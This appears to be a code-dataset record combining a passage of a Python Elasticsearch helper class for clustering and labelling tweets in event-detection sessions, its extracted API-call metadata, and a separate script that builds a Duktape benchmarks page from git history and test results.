res = my_connector.init_paginatedSearch(query)
return res
def get_cluster_tweets(self, index="test3", cid=0):
my_connector = Es_connector(index=index)
query = {
# "_source": [
# "id_str",
# "imagesCluster",
# "session_Twitter2015",
# "extended_entities"
# ],
"query": {
"term" : { "imagesCluster": cid }
}
}
res = my_connector.search(query)
return res
def get_event_image(self, index="test3", main_term="", related_terms=""):
my_connector = Es_connector(index=index)
terms = []
words = main_term + ' '
for t in related_terms:
terms.append({ "match": {
"text": {
"query": t['word'],
"boost": t['value']
}
}})
words += t['word']+ " "
terms.append({"match": {
"text": {
"query": main_term,
"boost": 2
}
}})
# res = my_connector.search({"query": {"term" : { "text" : word }}})
# query = {
# "bool": {
# "must": {
# "match": {
# "text": {
# "query": main_term,
# "operator": "or"
# }
# }
# },
# "should": terms
# }
# }
query = {
"size": 1,
"_source": [
"id_str",
"imagesCluster",
"session_Twitter2015",
"extended_entities"
],
"query": {
"bool": {
"must":
{
"exists": {
"field": "extended_entities"
}
},
"should": terms
}
}
}
# print(query)
res = my_connector.search(query)
return res
def get_valid_tweets(self, index="test3"):
my_connector = Es_connector(index=index)
res = my_connector.search({
"query": {
"simple_query_string": {
"fields": [
"text"
],
"query": word
}
}
})
# res = my_connector.bigSearch(
# {
# "_source": ["text", "id_str", "extended_entities", "user", "created_at", "link"],
# "query": {
# "simple_query_string": {
# "fields": [
# "text"
# ],
# "query": word
# }
# }
# })
return res['hits']['hits']
# ==================================================================
# Clusters
# ==================================================================
def get_clusters(self, index="test3", word=""):
my_connector = Es_connector(index=index)
res = my_connector.search({
"size": 1,
"query": {
"simple_query_string": {
"fields": [
"text"
],
"query": word
}
},
"aggs": {
"group_by_cluster": {
"terms": {
"field": "imagesCluster",
"size": 9999
}
}
}
})
# print("Clusters")
# print(res['aggregations']['group_by_cluster']['buckets'])
clusters = res['aggregations']['group_by_cluster']['buckets']
with open(index+'.json') as f:
data = json.load(f)
for cluster in clusters:
# print(cluster['key'])
images = data['duplicates'][cluster['key']]
# print(images[0])
cluster['image']=images[0]
cluster['size'] = len(images)
# print(clusters)
return clusters
def get_event_clusters(self, index="test3", main_term="", related_terms=""):
my_connector = Es_connector(index=index)
terms = []
words = main_term + ' '
for t in related_terms:
terms.append({ "match": {
"text": {
"query": t['word'],
"boost": t['value']
}
}})
words += t['word']+ " "
terms.append({"match": {
"text": {
"query": main_term,
"boost": 2
}
}})
# query = {
# "size": 0,
# "query": {
# "bool": {
# "should": terms
# }
# },
# "aggs": {
# "group_by_cluster": {
# "terms": {
# "field": "imagesCluster",
# "size": 200
# }
# }
# }
# }
query = {
"size": 0,
"query": {
"bool": {
"should": terms
}
},
"aggregations": {
"group_by_cluster": {
"terms": {
"field": "imagesCluster",
# "shard_size": 999999999,
"size": 999999
}
}
}
}
# print(query)
res = my_connector.search(query)
# print("Clusters")
# print(res['aggregations']['group_by_cluster']['buckets'])
clusters = res['aggregations']['group_by_cluster']['buckets']
with open(index + '.json') as f:
data = json.load(f)
for cluster in clusters:
# q1 = {
# "_source": [
# "text",
# "imagesCluster"
# ],
# "query": {
# "bool": {
# "should": terms,
# "filter": {
# "bool": {
# "should": [
# {
# "match": {
# "imagesCluster": cluster['key']
# }
# }
# ]
# }
# }
# }
# }
# }
q2 = {
"query": {
"term": {"imagesCluster": cluster['key']}
}
}
# cres1 = my_connector.search(q1)
cres = my_connector.count(q2)
# print(cluster['key'])
images = data['duplicates'][cluster['key']]
# print(images[0])
cluster['image'] = images[0]
# cluster['size'] = len(images)
# print(cres)
cluster['size'] = cres['count']
# cluster['size2'] = cres1['hits']['total']
# if cluster['key']==1452:
# print(cluster)
# print(clusters)
return clusters
# ==================================================================
# Sessions
# ==================================================================
# Get all sessions
def get_sessions(self):
my_connector = Es_connector(index=self.sessions_index, doc_type=self.sessions_doc_type)
query = {
"query": {
"match_all": {}
}
}
res = my_connector.search(query)
return res
# Get session by session ID
def get_session(self, id):
my_connector = Es_connector(index=self.sessions_index, doc_type=self.sessions_doc_type)
res = my_connector.get(id)
return res
# Get session by session name
def get_session_by_Name(self, name):
my_connector = Es_connector(index=self.sessions_index, doc_type=self.sessions_doc_type)
query = {
"query": {
"constant_score" : {
"filter" : {
"term" : {
"s_name" : name
}
}
}
}
}
res = my_connector.search(query)
return res
# Add new session
def add_session(self, name, index):
my_connector = Es_connector(index=self.sessions_index, doc_type=self.sessions_doc_type)
session = self.get_session_by_Name(name)
if session['hits']['total']==0:
res = my_connector.post({
"s_name": name,
"s_index": index,
"s_type": "tweet"
})
tweets_connector = Es_connector(index=index, doc_type="tweet")
tweets_connector.update_all('session_'+name, 'proposed')
return res
else:
return False
# Update specific field value in an Index
def update_all(self, index, doc_type, field, value):
my_connector = Es_connector(index=index, doc_type=doc_type)
res = my_connector.update_all(field, value)
return res
# Update session events results
def update_session_results(self, id, events, impact_data):
my_connector = Es_connector(index=self.sessions_index, doc_type=self.sessions_doc_type)
res = my_connector.update(id, {
"doc" : {
"events" : events,
"impact_data": impact_data
}
})
return res
# Get session events results
def get_session_results(self, id):
my_connector = Es_connector(index=self.sessions_index, doc_type=self.sessions_doc_type)
res = my_connector.get(id)
return res
# Delete session by name
def delete_session(self, id):
session_connector = Es_connector(index=self.sessions_index, doc_type=self.sessions_doc_type)
session = session_connector.get(id)
if session:
print("delete Session")
# print(session)
# 1. Delete session data from the tweets
tweets_connector = Es_connector(index=session['_source']['s_index'], doc_type=session['_source']['s_type'])
session_name = 'session_'+session['_source']['s_name']
print(session_name)
tweets_connector.remove_field_all(session_name)
# 2. Delete the session
session_connector.delete(id)
return True
else:
return False
# ==================================================================
# Tweets session status
# ==================================================================
# Set tweets status
def set_all_status(self, index, session, status):
tweets_connector = Es_connector(index=index, doc_type="tweet")
res = tweets_connector.update_all(session, status)
return res
def set_status(self, index, session, data):
tweets_connector = Es_connector(index=index, doc_type="tweet")
# All tweets
session = 'session_'+session
event = json.loads(data['event'])
# print("------------------------")
# print(data)
# print("------------------------")
# print(event)
# print(event['main_term'])
terms = []
words = event['main_term'] + ' '
for t in event['related_terms']:
terms.append({"match": {
"text": {
"query": t['word'],
"boost": t['value']
}
}})
words += t['word'] + " "
terms.append({"match": {
"text": {
"query": event['main_term'],
"boost": 2
}
}})
# query = {
# "query": {
# "bool": {
# "should": terms
# }
# }
# }
query = {
"query": {
"bool": {
"must": [
{
"bool": {
"should": terms
}
}
],
"filter": {
"bool": {
"should": [
{
"match": {
session: "proposed"
}
}
]
}
}
}
}
}
# print(query)
res = tweets_connector.update_query(query, session, data['status'])
# Event related
return res
def set_search_status(self, index, session, state, word):
tweets_connector = Es_connector(index=index, doc_type="tweet")
session = 'session_'+session
query = {
"query": {
"bool": {
"must": {
"simple_query_string": {
"fields": [
"text"
],
"query": word
}
},
"filter": {
"bool": {
"should": [
{
"match": {
session: "proposed"
}
}
]
}
}
}
}
}
res = tweets_connector.update_query(query, session, state)
return res
def set_search_status_force(self, index, session, state, word):
tweets_connector = Es_connector(index=index, doc_type="tweet")
session = 'session_'+session
query = {
"query": {
"bool": {
"must": {
"simple_query_string": {
"fields": [
"text"
],
"query": word
}
}
}
}
}
res = tweets_connector.update_query(query, session, state)
return res
def set_cluster_state(self, index, session, cid, state):
tweets_connector = Es_connector(index=index, doc_type="tweet")
# All tweets
session = 'session_'+session
query = {
"query": {
"term" : { "imagesCluster": cid }
}
}
res = tweets_connector.update_query(query, session, state)
return res
def set_tweet_state(self, index, session, tid, val):
tweets_connector = Es_connector(index=index, doc_type="tweet")
session = 'session_'+session
query = {
"doc" : {
session : val
}
}
res = tweets_connector.update(tid, query)
return res
def export_event(self, index, session):
my_connector = Es_connector(index=index)
res = my_connector.bigSearch(
{
"_source": {
"excludes": ["session_*"]
},
"query": {
"term": {
"session_"+session: "confirmed"
}
}
})
return res
# ==================================================================
# Beta
# ==================================================================
def get_event_tweets_count(self, index="test3", main_term="", related_terms=""):
my_connector = Es_connector(index=index)
terms = []
words = main_term + ' '
for t in related_terms:
terms.append({ "match": {
"text": {
"query": t['word'],
"boost": t['value']
}
}})
words += t['word']+ " "
terms.append({"match": {
"text": {
"query": main_term,
"boost": 2
}
}})
query = {
"query": {
"bool": {
"should": terms
}
}
}
res = my_connector.count(query)
return res['count']
def get_event_state_tweets_count(self, index="test3", session="", words="", state="confirmed"):
my_connector = Es_connector(index=index)
query = {
"query": {
"bool": {
"must": [
{
"match": {
"text": {
"query": words
}
}
}
],
"filter": {
"bool": {
"should": [
{
"match": {
"session_"+session: state
}
}
]
}
}
}
}
}
res = my_connector.count(query)
return res['count']
def get_words_tweets_count(self, index="test3", session="", words=""):
my_connector = Es_connector(index=index)
query = {
"query": {
"bool": {
"must": [
{
"match": {
"text": {
"query": words
}
}
}
]
}
}
}
res = my_connector.count(query)
return res['count']
def get_all_count(self, index="test3"):
my_connector = Es_connector(index=index)
query = {
"query": {
"match_all": {}
}
}
res = my_connector.count(query)
return res['count']
def get_words_count(self, index="test3", words=""):
my_connector = Es_connector(index=index)
query = {
"query": {
"simple_query_string": {
"fields": [
"text"
],
"query": words
}
}
}
res = my_connector.count(query)
return res['count']
def get_start_date(self, index):
my_connector = Es_connector(index=index)
res = my_connector.search_size({
"_source": [
"@timestamp",
"timestamp_ms"
],
"query": {
"match_all": {}
},
"sort": [
{
"@timestamp": {
"order": "asc"
}
}
]
},1)
return res['hits']['hits'][0]['_source']
def get_end_date(self, index):
my_connector = Es_connector(index=index)
res = my_connector.search_size({
"_source": [
"@timestamp",
"timestamp_ms"
],
"query": {
"match_all": {}
},
"sort": [
{
"@timestamp": {
"order": "desc"
}
}
]
},1)
return res['hits']['hits'][0]['_source']
def get_range_count(self, index, start, end):
my_connector = Es_connector(index=index)
query = {
"query": {
"range": {
"timestamp_ms": {
"gt": str(start),
"lt": str(end)
}
}
}
}
print(query)
res = my_connector.count(query)
return res['count']
def process_range_tweets(self, index, start, end, words,count):
sw = 'stopwords/twitter_all.txt'
my_connector = Es_connector(index=index)
res = my_connector.range_tweets(start, end, sw, words,count)
return res
def process_w2v_tweets(self, index, words,count):
sw = 'stopwords/twitter_all.txt'
my_connector = Es_connector(index=index)
res = my_connector.w2v_tweets(sw, words,count)
return res
def get_event_central_tweets(self, index="test3", main_term="", related_terms=""):
my_connector = Es_connector(index=index)
terms = []
words = main_term + ' '
for t in related_terms:
terms.append({ "match": {
"text": {
"query": t['word'],
"boost": t['value']
}
}})
words += t['word']+ " "
terms.append({"match": {
"text": {
"query": main_term,
"boost": 2
}
}})
query = {
"sort": [
"_score"
],
"query": {
"bool": {
"should": terms
}
}
}
res = my_connector.search_size(query,1)
return res
def get_event_tweets_bigsearch(self, index="test3", main_term="", related_terms=""):
my_connector = Es_connector(index=index)
terms = []
words = main_term + ' '
for t in related_terms:
terms.append({ "match": {
"text": {
"query": t['word'],
"boost": t['value']
}
}})
words += t['word']+ " "
terms.append({"match": {
"text": {
"query": main_term,
"boost": 2
}
}})
query = {
"sort": [
"_score"
],
"query": {
"bool": {
"should": terms
}
}
}
res = my_connector.bigTweetTextSearch(query)
return res
def getMean(self, index="test3", main_term="", related_terms=""):
my_connector = Es_connector(index=index)
terms = []
words = main_term + ' '
for t in related_terms:
terms.append({"match": {
"text": {
"query": t['word'],
"boost": t['value']
}
}})
words += t['word'] + " "
terms.append({"match": {
"text": {
"query": main_term,
"boost": 2
}
}})
query = {
"sort": [
"_score"
],
"_source": [
"_score"
],
"query": {
"bool": {
"should": terms
}
}
}
query = {
"size": 0,
"query": {
"bool": {
"should": terms
}
},
"aggs": {
"sum_scores": {
"sum": {
"script": "_score"
}
}
}
}
res = my_connector.search(query)
total = res['hits']['total']
sum = res['aggregations']['sum_scores']['value']
mean = sum / total
# res = my_connector.bigSearchMean(query)
return mean
def getSSE(self, index="test3", main_term="", related_terms="", mean=0):
my_connector = Es_connector(index=index)
terms = []
words = main_term + ' '
for t in related_terms:
terms.append({"match": {
"text": {
"query": t['word'],
"boost": t['value']
}
}})
words += t['word'] + " "
terms.append({"match": {
"text": {
"query": main_term,
"boost": 2
}
}})
query = {
"sort": [
"_score"
],
"query": {
"bool": {
"should": terms
}
}
}
res = my_connector.bigSearchSSE(query, mean)
return res
def d2v(self, tweet, data):
# data = ["I love machine learning. Its awesome.",
# "I love coding in python",
# "I love building chatbots python",
# "they chat amagingly well",
# "So we have saved the model and its ready for implementation. Lets play with it"]
print("=============================================================")
print("=============================================================")
print(tweet)
print("-------------")
print("-------------")
tagged_data = [TaggedDocument(words=word_tokenize(_d.lower()), tags=[str(i)]) for i, _d in enumerate(data)]
max_epochs = 100
vec_size = 20
alpha = 0.025
model = Doc2Vec(vector_size=vec_size,
alpha=alpha,
min_alpha=0.00025,
min_count=1,
dm=1)
model.build_vocab(tagged_data)
for epoch in range(max_epochs):
# print('iteration {0}'.format(epoch))
model.train(tagged_data,
total_examples=model.corpus_count,
epochs=model.iter)
# decrease the learning rate
model.alpha -= 0.0002
# fix the learning rate, no decay
model.min_alpha = model.alpha
# test_data = word_tokenize("So we have saved the model and its ready for implementation. Lets play with it".lower())
test_data = word_tokenize(tweet.lower())
v1 = model.infer_vector(test_data)
# print("V1_infer", v1)
# to find most similar doc using tags
similar_doc = model.docvecs.most_similar([v1])
print("similar_docs:")
print("-------------")
# print(similar_doc)
for doc in similar_doc:
print(data[int(doc[0])])
# print(doc[1])
print("=============================================================")
print("=============================================================")
# to find vector of doc in training data using tags or in other words, printing the vector of document at index 1 in training data
# print(model.docvecs['1'])
|
[
"json.load",
"mabed.es_corpus.Corpus",
"json.loads",
"timeit.default_timer",
"json.dumps",
"gensim.models.doc2vec.Doc2Vec",
"mabed.es_connector.Es_connector",
"mabed.mabed.MABED"
] |
[((1204, 1226), 'timeit.default_timer', 'timeit.default_timer', ([], {}), '()\n', (1224, 1226), False, 'import timeit\n'), ((1247, 1285), 'mabed.es_corpus.Corpus', 'Corpus', (['sw', 'maf', 'mrf', 'sep'], {'index': 'index'}), '(sw, maf, mrf, sep, index=index)\n', (1253, 1285), False, 'from mabed.es_corpus import Corpus\n'), ((1537, 1559), 'timeit.default_timer', 'timeit.default_timer', ([], {}), '()\n', (1557, 1559), False, 'import timeit\n'), ((1787, 1809), 'timeit.default_timer', 'timeit.default_timer', ([], {}), '()\n', (1807, 1809), False, 'import timeit\n'), ((1826, 1842), 'mabed.mabed.MABED', 'MABED', (['my_corpus'], {}), '(my_corpus)\n', (1831, 1842), False, 'from mabed.mabed import MABED\n'), ((4387, 4409), 'timeit.default_timer', 'timeit.default_timer', ([], {}), '()\n', (4407, 4409), False, 'import timeit\n'), ((4430, 4500), 'mabed.es_corpus.Corpus', 'Corpus', (['sw', 'maf', 'mrf', 'sep'], {'index': 'index', 'session': 'session', 'filter': 'filter'}), '(sw, maf, mrf, sep, index=index, session=session, filter=filter)\n', (4436, 4500), False, 'from mabed.es_corpus import Corpus\n'), ((4811, 4833), 'timeit.default_timer', 'timeit.default_timer', ([], {}), '()\n', (4831, 4833), False, 'import timeit\n'), ((5061, 5083), 'timeit.default_timer', 'timeit.default_timer', ([], {}), '()\n', (5081, 5083), False, 'import timeit\n'), ((5100, 5116), 'mabed.mabed.MABED', 'MABED', (['my_corpus'], {}), '(my_corpus)\n', (5105, 5116), False, 'from mabed.mabed import MABED\n'), ((7454, 7479), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index'}), '(index=index)\n', (7466, 7479), False, 'from mabed.es_connector import Es_connector\n'), ((8605, 8630), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index'}), '(index=index)\n', (8617, 8630), False, 'from mabed.es_connector import Es_connector\n'), ((8794, 8819), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index'}), '(index=index)\n', (8806, 8819), False, 'from 
mabed.es_connector import Es_connector\n'), ((9345, 9370), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index'}), '(index=index)\n', (9357, 9370), False, 'from mabed.es_connector import Es_connector\n'), ((9731, 9756), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index'}), '(index=index)\n', (9743, 9756), False, 'from mabed.es_connector import Es_connector\n'), ((10595, 10620), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index'}), '(index=index)\n', (10607, 10620), False, 'from mabed.es_connector import Es_connector\n'), ((11160, 11185), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index'}), '(index=index)\n', (11172, 11185), False, 'from mabed.es_connector import Es_connector\n'), ((12631, 12656), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index'}), '(index=index)\n', (12643, 12656), False, 'from mabed.es_connector import Es_connector\n'), ((14265, 14290), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index'}), '(index=index)\n', (14277, 14290), False, 'from mabed.es_connector import Es_connector\n'), ((16065, 16090), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index'}), '(index=index)\n', (16077, 16090), False, 'from mabed.es_connector import Es_connector\n'), ((16607, 16632), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index'}), '(index=index)\n', (16619, 16632), False, 'from mabed.es_connector import Es_connector\n'), ((18392, 18417), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index'}), '(index=index)\n', (18404, 18417), False, 'from mabed.es_connector import Es_connector\n'), ((19416, 19441), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index'}), '(index=index)\n', (19428, 19441), False, 'from mabed.es_connector import Es_connector\n'), ((20510, 20535), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index'}), 
'(index=index)\n', (20522, 20535), False, 'from mabed.es_connector import Es_connector\n'), ((23885, 23957), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'self.sessions_index', 'doc_type': 'self.sessions_doc_type'}), '(index=self.sessions_index, doc_type=self.sessions_doc_type)\n', (23897, 23957), False, 'from mabed.es_connector import Es_connector\n'), ((24226, 24298), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'self.sessions_index', 'doc_type': 'self.sessions_doc_type'}), '(index=self.sessions_index, doc_type=self.sessions_doc_type)\n', (24238, 24298), False, 'from mabed.es_connector import Es_connector\n'), ((24452, 24524), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'self.sessions_index', 'doc_type': 'self.sessions_doc_type'}), '(index=self.sessions_index, doc_type=self.sessions_doc_type)\n', (24464, 24524), False, 'from mabed.es_connector import Es_connector\n'), ((25028, 25100), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'self.sessions_index', 'doc_type': 'self.sessions_doc_type'}), '(index=self.sessions_index, doc_type=self.sessions_doc_type)\n', (25040, 25100), False, 'from mabed.es_connector import Es_connector\n'), ((25671, 25715), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index', 'doc_type': 'doc_type'}), '(index=index, doc_type=doc_type)\n', (25683, 25715), False, 'from mabed.es_connector import Es_connector\n'), ((25910, 25982), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'self.sessions_index', 'doc_type': 'self.sessions_doc_type'}), '(index=self.sessions_index, doc_type=self.sessions_doc_type)\n', (25922, 25982), False, 'from mabed.es_connector import Es_connector\n'), ((26263, 26335), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'self.sessions_index', 'doc_type': 'self.sessions_doc_type'}), '(index=self.sessions_index, doc_type=self.sessions_doc_type)\n', (26275, 26335), False, 'from 
mabed.es_connector import Es_connector\n'), ((26483, 26555), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'self.sessions_index', 'doc_type': 'self.sessions_doc_type'}), '(index=self.sessions_index, doc_type=self.sessions_doc_type)\n', (26495, 26555), False, 'from mabed.es_connector import Es_connector\n'), ((27438, 27481), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index', 'doc_type': '"""tweet"""'}), "(index=index, doc_type='tweet')\n", (27450, 27481), False, 'from mabed.es_connector import Es_connector\n'), ((27636, 27679), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index', 'doc_type': '"""tweet"""'}), "(index=index, doc_type='tweet')\n", (27648, 27679), False, 'from mabed.es_connector import Es_connector\n'), ((27754, 27779), 'json.loads', 'json.loads', (["data['event']"], {}), "(data['event'])\n", (27764, 27779), False, 'import json\n'), ((29535, 29578), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index', 'doc_type': '"""tweet"""'}), "(index=index, doc_type='tweet')\n", (29547, 29578), False, 'from mabed.es_connector import Es_connector\n'), ((30584, 30627), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index', 'doc_type': '"""tweet"""'}), "(index=index, doc_type='tweet')\n", (30596, 30627), False, 'from mabed.es_connector import Es_connector\n'), ((31228, 31271), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index', 'doc_type': '"""tweet"""'}), "(index=index, doc_type='tweet')\n", (31240, 31271), False, 'from mabed.es_connector import Es_connector\n'), ((31644, 31687), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index', 'doc_type': '"""tweet"""'}), "(index=index, doc_type='tweet')\n", (31656, 31687), False, 'from mabed.es_connector import Es_connector\n'), ((31958, 31983), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index'}), '(index=index)\n', (31970, 31983), False, 'from 
mabed.es_connector import Es_connector\n'), ((32587, 32612), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index'}), '(index=index)\n', (32599, 32612), False, 'from mabed.es_connector import Es_connector\n'), ((33455, 33480), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index'}), '(index=index)\n', (33467, 33480), False, 'from mabed.es_connector import Es_connector\n'), ((34248, 34273), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index'}), '(index=index)\n', (34260, 34273), False, 'from mabed.es_connector import Es_connector\n'), ((34722, 34747), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index'}), '(index=index)\n', (34734, 34747), False, 'from mabed.es_connector import Es_connector\n'), ((35015, 35040), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index'}), '(index=index)\n', (35027, 35040), False, 'from mabed.es_connector import Es_connector\n'), ((35414, 35439), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index'}), '(index=index)\n', (35426, 35439), False, 'from mabed.es_connector import Es_connector\n'), ((35950, 35975), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index'}), '(index=index)\n', (35962, 35975), False, 'from mabed.es_connector import Es_connector\n'), ((36502, 36527), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index'}), '(index=index)\n', (36514, 36527), False, 'from mabed.es_connector import Es_connector\n'), ((36997, 37022), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index'}), '(index=index)\n', (37009, 37022), False, 'from mabed.es_connector import Es_connector\n'), ((37230, 37255), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index'}), '(index=index)\n', (37242, 37255), False, 'from mabed.es_connector import Es_connector\n'), ((37442, 37467), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index'}), 
'(index=index)\n', (37454, 37467), False, 'from mabed.es_connector import Es_connector\n'), ((38360, 38385), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index'}), '(index=index)\n', (38372, 38385), False, 'from mabed.es_connector import Es_connector\n'), ((39222, 39247), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index'}), '(index=index)\n', (39234, 39247), False, 'from mabed.es_connector import Es_connector\n'), ((40612, 40637), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index'}), '(index=index)\n', (40624, 40637), False, 'from mabed.es_connector import Es_connector\n'), ((42141, 42226), 'gensim.models.doc2vec.Doc2Vec', 'Doc2Vec', ([], {'vector_size': 'vec_size', 'alpha': 'alpha', 'min_alpha': '(0.00025)', 'min_count': '(1)', 'dm': '(1)'}), '(vector_size=vec_size, alpha=alpha, min_alpha=0.00025, min_count=1, dm=1\n )\n', (42148, 42226), False, 'from gensim.models.doc2vec import Doc2Vec, TaggedDocument\n'), ((1304, 1326), 'timeit.default_timer', 'timeit.default_timer', ([], {}), '()\n', (1324, 1326), False, 'import timeit\n'), ((1635, 1657), 'timeit.default_timer', 'timeit.default_timer', ([], {}), '()\n', (1655, 1657), False, 'import timeit\n'), ((1915, 1937), 'timeit.default_timer', 'timeit.default_timer', ([], {}), '()\n', (1935, 1937), False, 'import timeit\n'), ((4578, 4600), 'timeit.default_timer', 'timeit.default_timer', ([], {}), '()\n', (4598, 4600), False, 'import timeit\n'), ((4909, 4931), 'timeit.default_timer', 'timeit.default_timer', ([], {}), '()\n', (4929, 4931), False, 'import timeit\n'), ((5189, 5211), 'timeit.default_timer', 'timeit.default_timer', ([], {}), '()\n', (5209, 5211), False, 'import timeit\n'), ((20105, 20117), 'json.load', 'json.load', (['f'], {}), '(f)\n', (20114, 20117), False, 'import json\n'), ((22197, 22209), 'json.load', 'json.load', (['f'], {}), '(f)\n', (22206, 22209), False, 'import json\n'), ((25368, 25411), 'mabed.es_connector.Es_connector', 
'Es_connector', ([], {'index': 'index', 'doc_type': '"""tweet"""'}), "(index=index, doc_type='tweet')\n", (25380, 25411), False, 'from mabed.es_connector import Es_connector\n'), ((26769, 26862), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': "session['_source']['s_index']", 'doc_type': "session['_source']['s_type']"}), "(index=session['_source']['s_index'], doc_type=session[\n '_source']['s_type'])\n", (26781, 26862), False, 'from mabed.es_connector import Es_connector\n'), ((3310, 3335), 'json.dumps', 'json.dumps', (['related_terms'], {}), '(related_terms)\n', (3320, 3335), False, 'import json\n'), ((6694, 6719), 'json.dumps', 'json.dumps', (['related_terms'], {}), '(related_terms)\n', (6704, 6719), False, 'import json\n')]
|
#!/usr/bin/env python2
import os
import sys
import re
import json
def main():
# Adapt manually.
duk = '/usr/local/bin/duk'
lzstring = '/home/duktape/duktape/lz-string/libs/lz-string.js'
duktape_repo = '/home/duktape/duktape'
duktape_testrunner_repo = '/home/duktape/duktape-testrunner'
duktape_testclient_config = '/home/duktape/duktape-testclient-config.yaml'
benchmarks_template = '/home/duktape/duktape/website/benchmarks.html'
merge_count = 1000
# Get the hashes we're interested in, in increasing merge order.
# os.system('cd %s && git pull --rebase' % duktape_repo)
os.system('cd %s && git log -n %d --merges --oneline --decorate=no --pretty=format:%%H > /tmp/tmp-hashes.txt' % (duktape_repo, merge_count))
hashes = []
with open('/tmp/tmp-hashes.txt', 'rb') as f:
for line in f:
line = line.strip()
if line != '':
hashes.append(line)
hashes.reverse()
print('%d hashes found' % len(hashes))
# Get any release tags matching the hashes for annotations.
re_release_tag = re.compile('^v\d+\.\d+\.\d+$')
annotations = []
for x,h in enumerate(hashes):
os.system('cd %s && git tag -l --points-at %s > /tmp/tmp-taglog.txt' % (duktape_repo, h))
with open('/tmp/tmp-taglog.txt', 'rb') as f:
for line in f:
line = line.strip()
m = re_release_tag.match(line)
if m is None:
continue
annotations.append({ 'x': x, 'tag': line })
print(json.dumps(annotations, indent=4))
# Get test data for hashed, and pack it into a JSON object embedded
# into the page.
req = { 'repo_full': 'svaarala/duktape', 'sha_list': hashes }
with open('/tmp/tmp-request.json', 'wb') as f:
f.write(json.dumps(req))
os.system('cd %s && cd client-simple-node && nodejs client.js --request-uri /query-commit-simple --config %s --request-file /tmp/tmp-request.json --output-file /tmp/tmp-result.json' % (duktape_testrunner_repo, duktape_testclient_config))
with open('/tmp/tmp-result.json', 'rb') as f:
data = json.loads(f.read())
for commit in data:
for run in commit.get('runs', []):
# Censor some fields which take a lot of space
if run.has_key('output_uri'):
del run['output_uri']
if run.has_key('result') and run['result'].has_key('traceback'):
del run['result']['traceback']
doc = {
'commit_simples': data,
'annotations': annotations
}
with open('/tmp/tmp-graphdata.json', 'wb') as f:
f.write(json.dumps(doc))
# There's a lot of JSON data so use http://pieroxy.net/blog/pages/lz-string/index.html
# to compress it. 'duk' executable can be used to compress data.
with open('/tmp/tmp-script.js', 'wb') as f:
f.write('''
var input = new TextDecoder().decode(readFile('/tmp/tmp-graphdata.json'));
var compressed = LZString.compressToBase64(input);
writeFile('/tmp/tmp-graphdata-compressed.txt', compressed);
''')
os.system('%s %s /tmp/tmp-script.js' % (duk, lzstring))
with open('/tmp/tmp-graphdata-compressed.txt', 'rb') as f:
graphdata = f.read()
# Embed the compressed data into the benchmarks.html template.
with open(benchmarks_template, 'rb') as f:
page = f.read()
page = page.replace('<!-- @DATA@ -->', \
'var rawGraphDataCompressed = "' + graphdata + '";')
with open('/tmp/benchmarks.html', 'wb') as f:
f.write(page)
# Done!
print('done')
if __name__ == '__main__':
main()
|
[
"os.system",
"json.dumps",
"re.compile"
] |
